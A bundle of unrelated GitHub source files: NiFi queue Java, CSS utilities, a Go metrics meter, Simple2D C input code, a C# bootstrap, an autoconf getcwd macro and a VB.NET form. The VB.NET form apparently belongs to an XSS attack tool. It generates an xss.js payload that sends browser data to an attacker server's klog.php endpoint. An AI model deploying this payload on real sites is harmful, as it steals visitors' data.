logger.error("Failed to drop the FlowFiles from queue {} due to {}", getQueueIdentifier(), ioe.toString());
logger.error("", ioe);
dropRequest.setState(DropFlowFileState.FAILURE, "Failed to drop FlowFiles due to " + ioe.toString());
return;
}
swapQueue.clear();
dropRequest.setCurrentSize(size());
dropRequest.setDroppedSize(dropRequest.getDroppedSize().add(droppedSize));
swapMode = false;
incrementSwapQueueSize(-droppedSize.getObjectCount(), -droppedSize.getByteCount(), 0);
logger.debug("For DropFlowFileRequest {}, dropped {} from Swap Queue", requestIdentifier, droppedSize);
final int swapFileCount = swapLocations.size();
final Iterator<String> swapLocationItr = swapLocations.iterator();
while (swapLocationItr.hasNext()) {
final String swapLocation = swapLocationItr.next();
SwapContents swapContents = null;
try {
if (dropRequest.getState() == DropFlowFileState.CANCELED) {
logger.info("Cancel requested for DropFlowFileRequest {}", requestIdentifier);
return;
}
swapContents = swapManager.swapIn(swapLocation, flowFileQueue);
droppedSize = dropAction.drop(swapContents.getFlowFiles(), requestor);
} catch (final IncompleteSwapFileException isfe) {
swapContents = isfe.getPartialContents();
final String warnMsg = "Failed to swap in FlowFiles from Swap File " + swapLocation + " because the file was corrupt. "
+ "Some FlowFiles may not be dropped from the queue until NiFi is restarted.";
logger.warn(warnMsg);
if (eventReporter != null) {
eventReporter.reportEvent(Severity.WARNING, "Drop FlowFiles", warnMsg);
}
} catch (final IOException ioe) {
logger.error("Failed to swap in FlowFiles from Swap File {} in order to drop the FlowFiles for Connection {} due to {}",
swapLocation, getQueueIdentifier(), ioe.toString());
logger.error("", ioe);
if (eventReporter != null) {
eventReporter.reportEvent(Severity.ERROR, "Drop FlowFiles", "Failed to swap in FlowFiles from Swap File " + swapLocation
+ ". The FlowFiles contained in this Swap File will not be dropped from the queue");
}
dropRequest.setState(DropFlowFileState.FAILURE, "Failed to swap in FlowFiles from Swap File " + swapLocation + " due to " + ioe.toString());
if (swapContents != null) {
activeQueue.addAll(swapContents.getFlowFiles()); // ensure that we don't lose the FlowFiles from our queue.
}
return;
}
dropRequest.setDroppedSize(dropRequest.getDroppedSize().add(droppedSize));
incrementSwapQueueSize(-droppedSize.getObjectCount(), -droppedSize.getByteCount(), -1);
dropRequest.setCurrentSize(size());
swapLocationItr.remove();
logger.debug("For DropFlowFileRequest {}, dropped {} for Swap File {}", requestIdentifier, droppedSize, swapLocation);
}
logger.debug("Dropped FlowFiles from {} Swap Files", swapFileCount);
logger.info("Successfully dropped {} FlowFiles ({} bytes) from Connection with ID {} on behalf of {}",
dropRequest.getDroppedSize().getObjectCount(), dropRequest.getDroppedSize().getByteCount(), getQueueIdentifier(), requestor);
dropRequest.setState(DropFlowFileState.COMPLETE);
} catch (final Exception e) {
logger.error("Failed to drop FlowFiles from Connection with ID {} due to {}", getQueueIdentifier(), e.toString());
logger.error("", e);
dropRequest.setState(DropFlowFileState.FAILURE, "Failed to drop FlowFiles due to " + e.toString());
}
} finally {
writeLock.unlock("Drop FlowFiles");
}
}
public SwapSummary recoverSwappedFlowFiles() {
int swapFlowFileCount = 0;
long swapByteCount = 0L;
Long maxId = null;
List<ResourceClaim> resourceClaims = new ArrayList<>();
final long startNanos = System.nanoTime();
int failures = 0;
writeLock.lock();
try {
final List<String> swapLocationsFromSwapManager;
try {
swapLocationsFromSwapManager = swapManager.recoverSwapLocations(flowFileQueue, swapPartitionName);
} catch (final IOException ioe) {
logger.error("Failed to determine whether or not any Swap Files exist for FlowFile Queue {}", getQueueIdentifier());
logger.error("", ioe);
if (eventReporter != null) {
eventReporter.reportEvent(Severity.ERROR, "FlowFile Swapping", "Failed to determine whether or not any Swap Files exist for FlowFile Queue " +
getQueueIdentifier() + "; see logs for more detials");
}
return null;
}
// If we have a duplicate of any of the swap location that we already know about, we need to filter those out now.
// This can happen when, upon startup, we need to swap data out during the swap file recovery. In this case, we do
// not want to include such a swap file in those that we recover, because those have already been accounted for when
// they were added to the queue, before being swapped out.
final Set<String> swapLocations = new LinkedHashSet<>(swapLocationsFromSwapManager);
swapLocations.removeAll(this.swapLocations);
logger.debug("Swap Manager reports {} Swap Files for {}: {}", swapLocations.size(), flowFileQueue, swapLocations);
for (final String swapLocation : swapLocations) {
try {
final SwapSummary summary = swapManager.getSwapSummary(swapLocation);
final QueueSize queueSize = summary.getQueueSize();
final Long maxSwapRecordId = summary.getMaxFlowFileId();
if (maxSwapRecordId != null) {
if (maxId == null || maxSwapRecordId > maxId) {
maxId = maxSwapRecordId;
}
}
swapFlowFileCount += queueSize.getObjectCount();
swapByteCount += queueSize.getByteCount();
resourceClaims.addAll(summary.getResourceClaims());
} catch (final IOException ioe) {
failures++;
logger.error("Failed to recover FlowFiles from Swap File {}; the file appears to be corrupt", swapLocation);
logger.error("", ioe);
if (eventReporter != null) {
eventReporter.reportEvent(Severity.ERROR, "FlowFile Swapping", "Failed to recover FlowFiles from Swap File " + swapLocation +
"; the file appears to be corrupt. See logs for more details");
}
}
}
incrementSwapQueueSize(swapFlowFileCount, swapByteCount, swapLocations.size());
this.swapLocations.addAll(swapLocations);
} finally {
writeLock.unlock("Recover Swap Files");
}
if (swapLocations.isEmpty()) {
logger.debug("No swap files were recovered for {}", flowFileQueue);
} else {
final long millis = TimeUnit.NANOSECONDS.toMillis(System.nanoTime() - startNanos);
logger.info("Recovered {} swap files for {} in {} millis", swapLocations.size() - failures, this, millis);
}
return new StandardSwapSummary(new QueueSize(swapFlowFileCount, swapByteCount), maxId, resourceClaims);
}
protected void incrementActiveQueueSize(final int count, final long bytes) {
boolean updated = false;
while (!updated) {
final FlowFileQueueSize original = size.get();
final FlowFileQueueSize newSize = new FlowFileQueueSize(
original.getActiveCount() + count, original.getActiveBytes() + bytes,
original.getSwappedCount(), original.getSwappedBytes(), original.getSwapFileCount(),
original.getUnacknowledgedCount(), original.getUnacknowledgedBytes());
updated = updateSize(original, newSize);
if (updated) {
logIfNegative(original, newSize, "active");
}
}
}
private void incrementSwapQueueSize(final int count, final long bytes, final int fileCount) {
boolean updated = false;
while (!updated) {
final FlowFileQueueSize original = getFlowFileQueueSize();
final FlowFileQueueSize newSize = new FlowFileQueueSize(original.getActiveCount(), original.getActiveBytes(),
original.getSwappedCount() + count, original.getSwappedBytes() + bytes, original.getSwapFileCount() + fileCount,
original.getUnacknowledgedCount(), original.getUnacknowledgedBytes());
updated = updateSize(original, newSize);
if (updated) {
logIfNegative(original, newSize, "swap");
}
}
}
private void incrementUnacknowledgedQueueSize(final int count, final long bytes) {
boolean updated = false;
while (!updated) {
final FlowFileQueueSize original = size.get();
final FlowFileQueueSize newSize = new FlowFileQueueSize(original.getActiveCount(), original.getActiveBytes(),
original.getSwappedCount(), original.getSwappedBytes(), original.getSwapFileCount(),
original.getUnacknowledgedCount() + count, original.getUnacknowledgedBytes() + bytes);
updated = updateSize(original, newSize);
if (updated) {
logIfNegative(original, newSize, "Unacknowledged");
}
}
}
private void logIfNegative(final FlowFileQueueSize original, final FlowFileQueueSize newSize, final String counterName) {
if (newSize.getActiveBytes() < 0 || newSize.getActiveCount() < 0
|| newSize.getSwappedBytes() < 0 || newSize.getSwappedCount() < 0
|| newSize.getUnacknowledgedBytes() < 0 || newSize.getUnacknowledgedCount() < 0) {
logger.error("Updated Size of Queue " + counterName + " from " + original + " to " + newSize, new RuntimeException("Cannot create negative queue size"));
}
}
protected boolean updateSize(final FlowFileQueueSize expected, final FlowFileQueueSize updated) {
return size.compareAndSet(expected, updated);
}
public FlowFileQueueSize getFlowFileQueueSize() {
return size.get();
}
public void inheritQueueContents(final FlowFileQueueContents queueContents) {
writeLock.lock();
try {
putAll(queueContents.getActiveFlowFiles());
final List<String> inheritedSwapLocations = queueContents.getSwapLocations();
swapLocations.addAll(inheritedSwapLocations);
incrementSwapQueueSize(queueContents.getSwapSize().getObjectCount(), queueContents.getSwapSize().getByteCount(), queueContents.getSwapLocations().size());
if (!inheritedSwapLocations.isEmpty()) {
logger.debug("Inherited the following swap locations: {}", inheritedSwapLocations);
}
} finally {
writeLock.unlock("inheritQueueContents");
}
}
public FlowFileQueueContents packageForRebalance(final String newPartitionName) {
writeLock.lock();
try {
final List<FlowFileRecord> activeRecords = new ArrayList<>(this.activeQueue);
final List<String> updatedSwapLocations = new ArrayList<>(swapLocations.size());
for (final String swapLocation : swapLocations) {
try {
final String updatedSwapLocation = swapManager.changePartitionName(swapLocation, newPartitionName);
updatedSwapLocations.add(updatedSwapLocation);
} catch (final IOException ioe) {
logger.error("Failed to update Swap File {} to reflect that the contents are now owned by Partition '{}'", swapLocation, newPartitionName, ioe);
}
}
this.swapLocations.clear();
this.activeQueue.clear();
final int swapQueueCount = swapQueue.size();
final long swapQueueBytes = swapQueue.stream().mapToLong(FlowFileRecord::getSize).sum();
activeRecords.addAll(swapQueue);
swapQueue.clear();
this.swapMode = false;
QueueSize swapSize;
boolean updated;
do {
final FlowFileQueueSize currentSize = getFlowFileQueueSize();
swapSize = new QueueSize(currentSize.getSwappedCount() - swapQueueCount, currentSize.getSwappedBytes() - swapQueueBytes);
final FlowFileQueueSize updatedSize = new FlowFileQueueSize(0, 0, 0, 0, 0, currentSize.getUnacknowledgedCount(), currentSize.getUnacknowledgedBytes());
updated = updateSize(currentSize, updatedSize);
} while (!updated);
logger.debug("Cleared {} to package FlowFile for rebalance to {}", this, newPartitionName);
return new FlowFileQueueContents(activeRecords, updatedSwapLocations, swapSize);
} finally {
writeLock.unlock("packageForRebalance(SwappablePriorityQueue)");
}
}
@Override
public String toString() {
return "SwappablePriorityQueue[queueId=" + flowFileQueue.getIdentifier() + ", partition=" + swapPartitionName + "]";
}
}
| {
"pile_set_name": "Github"
} |
montreal = {
name = "Montreal"
map_template = north_america_45_60_latitude_north
geocoordinate = { -73.58329695810 45.49999920560 } #from Natural Earth
major = true
regions = {
canada
}
}
| {
"pile_set_name": "Github"
} |
/* file generated by 'generate-global-headers.bat' */
#include "..\../crypto/bf/blowfish.h"
| {
"pile_set_name": "Github"
} |
.p-0 padding: 0;
.p-1 padding: 0.25rem;
.p-2 padding: 0.5rem;
.p-3 padding: 0.75rem;
.p-4 padding: 1rem;
.p-5 padding: 1.25rem;
.p-6 padding: 1.5rem;
.p-8 padding: 2rem;
.p-10 padding: 2.5rem;
.p-12 padding: 3rem;
.p-16 padding: 4rem;
.p-20 padding: 5rem;
.p-24 padding: 6rem;
.p-32 padding: 8rem;
.p-40 padding: 10rem;
.p-48 padding: 12rem;
.p-56 padding: 14rem;
.p-64 padding: 16rem;
.p-px padding: 1px;
.py-0 padding-top: 0; padding-bottom: 0;
.py-1 padding-top: 0.25rem; padding-bottom: 0.25rem;
.py-2 padding-top: 0.5rem; padding-bottom: 0.5rem;
.py-3 padding-top: 0.75rem; padding-bottom: 0.75rem;
.py-4 padding-top: 1rem; padding-bottom: 1rem;
.py-5 padding-top: 1.25rem; padding-bottom: 1.25rem;
.py-6 padding-top: 1.5rem; padding-bottom: 1.5rem;
.py-8 padding-top: 2rem; padding-bottom: 2rem;
.py-10 padding-top: 2.5rem; padding-bottom: 2.5rem;
.py-12 padding-top: 3rem; padding-bottom: 3rem;
.py-16 padding-top: 4rem; padding-bottom: 4rem;
.py-20 padding-top: 5rem; padding-bottom: 5rem;
.py-24 padding-top: 6rem; padding-bottom: 6rem;
.py-32 padding-top: 8rem; padding-bottom: 8rem;
.py-40 padding-top: 10rem; padding-bottom: 10rem;
.py-48 padding-top: 12rem; padding-bottom: 12rem;
.py-56 padding-top: 14rem; padding-bottom: 14rem;
.py-64 padding-top: 16rem; padding-bottom: 16rem;
.py-px padding-top: 1px; padding-bottom: 1px;
.px-0 padding-right: 0; padding-left: 0;
.px-1 padding-right: 0.25rem; padding-left: 0.25rem;
.px-2 padding-right: 0.5rem; padding-left: 0.5rem;
.px-3 padding-right: 0.75rem; padding-left: 0.75rem;
.px-4 padding-right: 1rem; padding-left: 1rem;
.px-5 padding-right: 1.25rem; padding-left: 1.25rem;
.px-6 padding-right: 1.5rem; padding-left: 1.5rem;
.px-8 padding-right: 2rem; padding-left: 2rem;
.px-10 padding-right: 2.5rem; padding-left: 2.5rem;
.px-12 padding-right: 3rem; padding-left: 3rem;
.px-16 padding-right: 4rem; padding-left: 4rem;
.px-20 padding-right: 5rem; padding-left: 5rem;
.px-24 padding-right: 6rem; padding-left: 6rem;
.px-32 padding-right: 8rem; padding-left: 8rem;
.px-40 padding-right: 10rem; padding-left: 10rem;
.px-48 padding-right: 12rem; padding-left: 12rem;
.px-56 padding-right: 14rem; padding-left: 14rem;
.px-64 padding-right: 16rem; padding-left: 16rem;
.px-px padding-right: 1px; padding-left: 1px;
.pt-0 padding-top: 0;
.pt-1 padding-top: 0.25rem;
.pt-2 padding-top: 0.5rem;
.pt-3 padding-top: 0.75rem;
.pt-4 padding-top: 1rem;
.pt-5 padding-top: 1.25rem;
.pt-6 padding-top: 1.5rem;
.pt-8 padding-top: 2rem;
.pt-10 padding-top: 2.5rem;
.pt-12 padding-top: 3rem;
.pt-16 padding-top: 4rem;
.pt-20 padding-top: 5rem;
.pt-24 padding-top: 6rem;
.pt-32 padding-top: 8rem;
.pt-40 padding-top: 10rem;
.pt-48 padding-top: 12rem;
.pt-56 padding-top: 14rem;
.pt-64 padding-top: 16rem;
.pt-px padding-top: 1px;
.pr-0 padding-right: 0;
.pr-1 padding-right: 0.25rem;
.pr-2 padding-right: 0.5rem;
.pr-3 padding-right: 0.75rem;
.pr-4 padding-right: 1rem;
.pr-5 padding-right: 1.25rem;
.pr-6 padding-right: 1.5rem;
.pr-8 padding-right: 2rem;
.pr-10 padding-right: 2.5rem;
.pr-12 padding-right: 3rem;
.pr-16 padding-right: 4rem;
.pr-20 padding-right: 5rem;
.pr-24 padding-right: 6rem;
.pr-32 padding-right: 8rem;
.pr-40 padding-right: 10rem;
.pr-48 padding-right: 12rem;
.pr-56 padding-right: 14rem;
.pr-64 padding-right: 16rem;
.pr-px padding-right: 1px;
.pb-0 padding-bottom: 0;
.pb-1 padding-bottom: 0.25rem;
.pb-2 padding-bottom: 0.5rem;
.pb-3 padding-bottom: 0.75rem;
.pb-4 padding-bottom: 1rem;
.pb-5 padding-bottom: 1.25rem;
.pb-6 padding-bottom: 1.5rem;
.pb-8 padding-bottom: 2rem;
.pb-10 padding-bottom: 2.5rem;
.pb-12 padding-bottom: 3rem;
.pb-16 padding-bottom: 4rem;
.pb-20 padding-bottom: 5rem;
.pb-24 padding-bottom: 6rem;
.pb-32 padding-bottom: 8rem;
.pb-40 padding-bottom: 10rem;
.pb-48 padding-bottom: 12rem;
.pb-56 padding-bottom: 14rem;
.pb-64 padding-bottom: 16rem;
.pb-px padding-bottom: 1px;
.pl-0 padding-left: 0;
.pl-1 padding-left: 0.25rem;
.pl-2 padding-left: 0.5rem;
.pl-3 padding-left: 0.75rem;
.pl-4 padding-left: 1rem;
.pl-5 padding-left: 1.25rem;
.pl-6 padding-left: 1.5rem;
.pl-8 padding-left: 2rem;
.pl-10 padding-left: 2.5rem;
.pl-12 padding-left: 3rem;
.pl-16 padding-left: 4rem;
.pl-20 padding-left: 5rem;
.pl-24 padding-left: 6rem;
.pl-32 padding-left: 8rem;
.pl-40 padding-left: 10rem;
.pl-48 padding-left: 12rem;
.pl-56 padding-left: 14rem;
.pl-64 padding-left: 16rem;
.pl-px padding-left: 1px;
| {
"pile_set_name": "Github"
} |
package metrics
import (
"math"
"sync"
"sync/atomic"
"time"
)
// Meters count events to produce exponentially-weighted moving average rates
// at one-, five-, and fifteen-minutes and a mean rate.
type Meter interface {
Count() int64
Mark(int64)
Rate1() float64
Rate5() float64
Rate15() float64
RateMean() float64
Snapshot() Meter
Stop()
}
// GetOrRegisterMeter returns an existing Meter or constructs and registers a
// new StandardMeter.
// Be sure to unregister the meter from the registry once it is of no use to
// allow for garbage collection.
func GetOrRegisterMeter(name string, r Registry) Meter {
if nil == r {
r = DefaultRegistry
}
return r.GetOrRegister(name, NewMeter).(Meter)
}
// NewMeter constructs a new StandardMeter and launches a goroutine.
// Be sure to call Stop() once the meter is of no use to allow for garbage collection.
func NewMeter() Meter {
if UseNilMetrics {
return NilMeter{}
}
m := newStandardMeter()
arbiter.Lock()
defer arbiter.Unlock()
arbiter.meters[m] = struct{}{}
if !arbiter.started {
arbiter.started = true
go arbiter.tick()
}
return m
}
// NewMeter constructs and registers a new StandardMeter and launches a
// goroutine.
// Be sure to unregister the meter from the registry once it is of no use to
// allow for garbage collection.
func NewRegisteredMeter(name string, r Registry) Meter {
c := NewMeter()
if nil == r {
r = DefaultRegistry
}
r.Register(name, c)
return c
}
// MeterSnapshot is a read-only copy of another Meter.
type MeterSnapshot struct {
count int64
rate1, rate5, rate15, rateMean uint64
}
// Count returns the count of events at the time the snapshot was taken.
func (m *MeterSnapshot) Count() int64 { return m.count }
// Mark panics.
func (*MeterSnapshot) Mark(n int64) {
panic("Mark called on a MeterSnapshot")
}
// Rate1 returns the one-minute moving average rate of events per second at the
// time the snapshot was taken.
func (m *MeterSnapshot) Rate1() float64 { return math.Float64frombits(m.rate1) }
// Rate5 returns the five-minute moving average rate of events per second at
// the time the snapshot was taken.
func (m *MeterSnapshot) Rate5() float64 { return math.Float64frombits(m.rate5) }
// Rate15 returns the fifteen-minute moving average rate of events per second
// at the time the snapshot was taken.
func (m *MeterSnapshot) Rate15() float64 { return math.Float64frombits(m.rate15) }
// RateMean returns the meter's mean rate of events per second at the time the
// snapshot was taken.
func (m *MeterSnapshot) RateMean() float64 { return math.Float64frombits(m.rateMean) }
// Snapshot returns the snapshot.
func (m *MeterSnapshot) Snapshot() Meter { return m }
// Stop is a no-op.
func (m *MeterSnapshot) Stop() {}
// NilMeter is a no-op Meter.
type NilMeter struct{}
// Count is a no-op.
func (NilMeter) Count() int64 { return 0 }
// Mark is a no-op.
func (NilMeter) Mark(n int64) {}
// Rate1 is a no-op.
func (NilMeter) Rate1() float64 { return 0.0 }
// Rate5 is a no-op.
func (NilMeter) Rate5() float64 { return 0.0 }
// Rate15is a no-op.
func (NilMeter) Rate15() float64 { return 0.0 }
// RateMean is a no-op.
func (NilMeter) RateMean() float64 { return 0.0 }
// Snapshot is a no-op.
func (NilMeter) Snapshot() Meter { return NilMeter{} }
// Stop is a no-op.
func (NilMeter) Stop() {}
// StandardMeter is the standard implementation of a Meter.
type StandardMeter struct {
snapshot *MeterSnapshot
a1, a5, a15 EWMA
startTime time.Time
stopped uint32
}
func newStandardMeter() *StandardMeter {
return &StandardMeter{
snapshot: &MeterSnapshot{},
a1: NewEWMA1(),
a5: NewEWMA5(),
a15: NewEWMA15(),
startTime: time.Now(),
}
}
// Stop stops the meter, Mark() will be a no-op if you use it after being stopped.
func (m *StandardMeter) Stop() {
if atomic.CompareAndSwapUint32(&m.stopped, 0, 1) {
arbiter.Lock()
delete(arbiter.meters, m)
arbiter.Unlock()
}
}
// Count returns the number of events recorded.
func (m *StandardMeter) Count() int64 {
return atomic.LoadInt64(&m.snapshot.count)
}
// Mark records the occurance of n events.
func (m *StandardMeter) Mark(n int64) {
if atomic.LoadUint32(&m.stopped) == 1 {
return
}
atomic.AddInt64(&m.snapshot.count, n)
m.a1.Update(n)
m.a5.Update(n)
m.a15.Update(n)
m.updateSnapshot()
}
// Rate1 returns the one-minute moving average rate of events per second.
func (m *StandardMeter) Rate1() float64 {
return math.Float64frombits(atomic.LoadUint64(&m.snapshot.rate1))
}
// Rate5 returns the five-minute moving average rate of events per second.
func (m *StandardMeter) Rate5() float64 {
return math.Float64frombits(atomic.LoadUint64(&m.snapshot.rate5))
}
// Rate15 returns the fifteen-minute moving average rate of events per second.
func (m *StandardMeter) Rate15() float64 {
return math.Float64frombits(atomic.LoadUint64(&m.snapshot.rate15))
}
// RateMean returns the meter's mean rate of events per second.
func (m *StandardMeter) RateMean() float64 {
return math.Float64frombits(atomic.LoadUint64(&m.snapshot.rateMean))
}
// Snapshot returns a read-only copy of the meter.
func (m *StandardMeter) Snapshot() Meter {
copiedSnapshot := MeterSnapshot{
count: atomic.LoadInt64(&m.snapshot.count),
rate1: atomic.LoadUint64(&m.snapshot.rate1),
rate5: atomic.LoadUint64(&m.snapshot.rate5),
rate15: atomic.LoadUint64(&m.snapshot.rate15),
rateMean: atomic.LoadUint64(&m.snapshot.rateMean),
}
return &copiedSnapshot
}
func (m *StandardMeter) updateSnapshot() {
rate1 := math.Float64bits(m.a1.Rate())
rate5 := math.Float64bits(m.a5.Rate())
rate15 := math.Float64bits(m.a15.Rate())
rateMean := math.Float64bits(float64(m.Count()) / time.Since(m.startTime).Seconds())
atomic.StoreUint64(&m.snapshot.rate1, rate1)
atomic.StoreUint64(&m.snapshot.rate5, rate5)
atomic.StoreUint64(&m.snapshot.rate15, rate15)
atomic.StoreUint64(&m.snapshot.rateMean, rateMean)
}
func (m *StandardMeter) tick() {
m.a1.Tick()
m.a5.Tick()
m.a15.Tick()
m.updateSnapshot()
}
// meterArbiter ticks meters every 5s from a single goroutine.
// meters are references in a set for future stopping.
type meterArbiter struct {
sync.RWMutex
started bool
meters map[*StandardMeter]struct{}
ticker *time.Ticker
}
var arbiter = meterArbiter{ticker: time.NewTicker(5e9), meters: make(map[*StandardMeter]struct{})}
// Ticks meters on the scheduled interval
func (ma *meterArbiter) tick() {
for {
select {
case <-ma.ticker.C:
ma.tickMeters()
}
}
}
func (ma *meterArbiter) tickMeters() {
ma.RLock()
defer ma.RUnlock()
for meter := range ma.meters {
meter.tick()
}
}
| {
"pile_set_name": "Github"
} |
// input.c
#include "../include/simple2d.h"
/*
* Get the mouse coordinates relative to the viewport
*/
void S2D_GetMouseOnViewport(S2D_Window *window, int wx, int wy, int *x, int *y) {
double scale; // viewport scale factor
int w, h; // width and height of scaled viewport
switch (window->viewport.mode) {
case S2D_FIXED: case S2D_EXPAND:
*x = wx / (window->orig_width / (double)window->viewport.width);
*y = wy / (window->orig_height / (double)window->viewport.height);
break;
case S2D_SCALE:
S2D_GL_GetViewportScale(window, &w, &h, &scale);
*x = wx * 1 / scale - (window->width - w) / (2.0 * scale);
*y = wy * 1 / scale - (window->height - h) / (2.0 * scale);
break;
case S2D_STRETCH:
*x = wx * window->viewport.width / (double)window->width;
*y = wy * window->viewport.height / (double)window->height;
break;
}
}
/*
* Show the cursor over the window
*/
void S2D_ShowCursor() {
SDL_ShowCursor(SDL_ENABLE);
}
/*
* Hide the cursor over the window
*/
void S2D_HideCursor() {
SDL_ShowCursor(SDL_DISABLE);
}
| {
"pile_set_name": "Github"
} |
{
"name": "Hipmunk",
"description": "A service for finding hotels and flights.",
"url": "https://www.hipmunk.com/"
} | {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Data;
using System.Linq;
using System.Threading.Tasks;
using System.Windows;
using System.Windows.Navigation;
using Microsoft.Practices.Unity;
using ServiceImplementations;
using Controllers;
using ServiceInterfaces;
using ViewModels;
namespace UI
{
public partial class App : Application
{
private void OnApplicationStartup(object sender, StartupEventArgs e)
{
CreateMappings();
container = new UnityContainer();
container.RegisterType<ISettings, ApplicationSettings>();
container.RegisterType<IObjectMapper, MapperAutoMapper>();
container.RegisterType<ITaskService, TaskServiceAdo>();
container.RegisterType<TaskListController>();
container.RegisterType<TaskListView>();
MainWindow = container.Resolve<TaskListView>();
MainWindow.Show();
((TaskListController)MainWindow.DataContext).OnLoad();
}
private void CreateMappings()
{
AutoMapper.Mapper.CreateMap<TaskDto, TaskViewModel>();
}
private IUnityContainer container;
}
}
| {
"pile_set_name": "Github"
} |
Imports System.IO
Public Class xss_info_browser_detector
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
On Error Resume Next
Dim ran = New Random()
Dim tmp = ran.Next(300, 350)
Dim stream As New IO.StreamWriter(Application.StartupPath & "\xss.js")
stream.WriteLine("if (document.getElementById('xenotix_brfg" & Str(tmp) & "') == null){ ")
stream.WriteLine(TextBox1.Text)
stream.WriteLine("new Image().src = 'http://" & xss_server.server_ip & "/klog.php?log='+ret;")
stream.WriteLine(" script = document.createElement('script');script.id = 'xenotix_brfg" & Str(tmp) & "'; document.body.appendChild(script); }")
stream.Close()
Button1.Enabled = False
Timer1.Enabled = True
End Sub
Private Sub xss_info_browser_fingerprint_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error Resume Next
TextBox1.Visible = False
IO.File.Delete("logs.txt")
End Sub
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
On Error Resume Next
IO.File.Delete("xss.js")
IO.File.Delete("logs.txt")
Me.Close()
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
On Error Resume Next
Dim line As String = ""
Dim readfile As System.IO.TextReader = New StreamReader(Application.StartupPath & "\logs.txt")
line = readfile.ReadToEnd()
If Not line = "" Then
WebBrowser1.ScriptErrorsSuppressed = True
WebBrowser1.DocumentText = line
Timer1.Enabled = False
End If
readfile.Close()
readfile = Nothing
End Sub
End Class | {
"pile_set_name": "Github"
} |
# getcwd.m4 - check for working getcwd that is compatible with glibc
# Copyright (C) 2001, 2003-2007, 2009-2020 Free Software Foundation, Inc.
# This file is free software; the Free Software Foundation
# gives unlimited permission to copy and/or distribute it,
# with or without modifications, as long as this notice is preserved.
# Written by Paul Eggert.
# serial 18
AC_DEFUN([gl_FUNC_GETCWD_NULL],
[
AC_REQUIRE([AC_CANONICAL_HOST]) dnl for cross-compiles
AC_CHECK_HEADERS_ONCE([unistd.h])
AC_CACHE_CHECK([whether getcwd (NULL, 0) allocates memory for result],
[gl_cv_func_getcwd_null],
[AC_RUN_IFELSE([AC_LANG_PROGRAM([[
# include <stdlib.h>
# if HAVE_UNISTD_H
# include <unistd.h>
# else /* on Windows with MSVC */
# include <direct.h>
# endif
# ifndef getcwd
char *getcwd ();
# endif
]], [[
#if defined _WIN32 && ! defined __CYGWIN__
/* mingw cwd does not start with '/', but getcwd does allocate.
However, mingw fails to honor non-zero size. */
#else
if (chdir ("/") != 0)
return 1;
else
{
char *f = getcwd (NULL, 0);
if (! f)
return 2;
if (f[0] != '/')
{ free (f); return 3; }
if (f[1] != '\0')
{ free (f); return 4; }
free (f);
return 0;
}
#endif
]])],
[gl_cv_func_getcwd_null=yes],
[gl_cv_func_getcwd_null=no],
[[case "$host_os" in
# Guess yes on glibc systems.
*-gnu* | gnu*) gl_cv_func_getcwd_null="guessing yes";;
# Guess yes on musl systems.
*-musl*) gl_cv_func_getcwd_null="guessing yes";;
# Guess yes on Cygwin.
cygwin*) gl_cv_func_getcwd_null="guessing yes";;
# If we don't know, obey --enable-cross-guesses.
*) gl_cv_func_getcwd_null="$gl_cross_guess_normal";;
esac
]])])
])
AC_DEFUN([gl_FUNC_GETCWD_SIGNATURE],
[
AC_CACHE_CHECK([for getcwd with POSIX signature],
[gl_cv_func_getcwd_posix_signature],
[AC_COMPILE_IFELSE(
[AC_LANG_PROGRAM(
[[#include <unistd.h>]],
[[extern
#ifdef __cplusplus
"C"
#endif
char *getcwd (char *, size_t);
]])
],
[gl_cv_func_getcwd_posix_signature=yes],
[gl_cv_func_getcwd_posix_signature=no])
])
])
dnl Guarantee that getcwd will malloc with a NULL first argument. Assumes
dnl that either the system getcwd is robust, or that calling code is okay
dnl with spurious failures when run from a directory with an absolute name
dnl larger than 4k bytes.
dnl
dnl Assumes that getcwd exists; if you are worried about obsolete
dnl platforms that lacked getcwd(), then you need to use the GPL module.
AC_DEFUN([gl_FUNC_GETCWD_LGPL],
[
AC_REQUIRE([gl_UNISTD_H_DEFAULTS])
AC_REQUIRE([gl_FUNC_GETCWD_NULL])
AC_REQUIRE([gl_FUNC_GETCWD_SIGNATURE])
case $gl_cv_func_getcwd_null,$gl_cv_func_getcwd_posix_signature in
*yes,yes) ;;
*)
dnl Minimal replacement lib/getcwd-lgpl.c.
REPLACE_GETCWD=1
;;
esac
])
dnl Check for all known getcwd bugs; useful for a program likely to be
dnl executed from an arbitrary location.
AC_DEFUN([gl_FUNC_GETCWD],
[
AC_REQUIRE([gl_UNISTD_H_DEFAULTS])
AC_REQUIRE([gl_FUNC_GETCWD_NULL])
AC_REQUIRE([gl_FUNC_GETCWD_SIGNATURE])
AC_REQUIRE([AC_CANONICAL_HOST]) dnl for cross-compiles
gl_abort_bug=no
case "$host_os" in
mingw*)
gl_cv_func_getcwd_path_max=yes
;;
*)
gl_FUNC_GETCWD_PATH_MAX
case "$gl_cv_func_getcwd_null" in
*yes)
gl_FUNC_GETCWD_ABORT_BUG([gl_abort_bug=yes])
;;
esac
;;
esac
dnl Define HAVE_MINIMALLY_WORKING_GETCWD and HAVE_PARTLY_WORKING_GETCWD
dnl if appropriate.
case "$gl_cv_func_getcwd_path_max" in
*"no" | *"no, it has the AIX bug") ;;
*)
AC_DEFINE([HAVE_MINIMALLY_WORKING_GETCWD], [1],
[Define to 1 if getcwd minimally works, that is, its result can be
trusted when it succeeds.])
;;
esac
case "$gl_cv_func_getcwd_path_max" in
*"no, but it is partly working")
AC_DEFINE([HAVE_PARTLY_WORKING_GETCWD], [1],
[Define to 1 if getcwd works, except it sometimes fails when it
shouldn't, setting errno to ERANGE, ENAMETOOLONG, or ENOENT.])
;;
*"yes, but with shorter paths")
AC_DEFINE([HAVE_GETCWD_SHORTER], [1],
[Define to 1 if getcwd works, but with shorter paths
than is generally tested with the replacement.])
;;
esac
if { case "$gl_cv_func_getcwd_null" in *yes) false;; *) true;; esac; } \
|| test $gl_cv_func_getcwd_posix_signature != yes \
|| { case "$gl_cv_func_getcwd_path_max" in *yes*) false;; *) true;; esac; } \
|| test $gl_abort_bug = yes; then
REPLACE_GETCWD=1
fi
])
# Prerequisites of lib/getcwd.c, when full replacement is in effect.
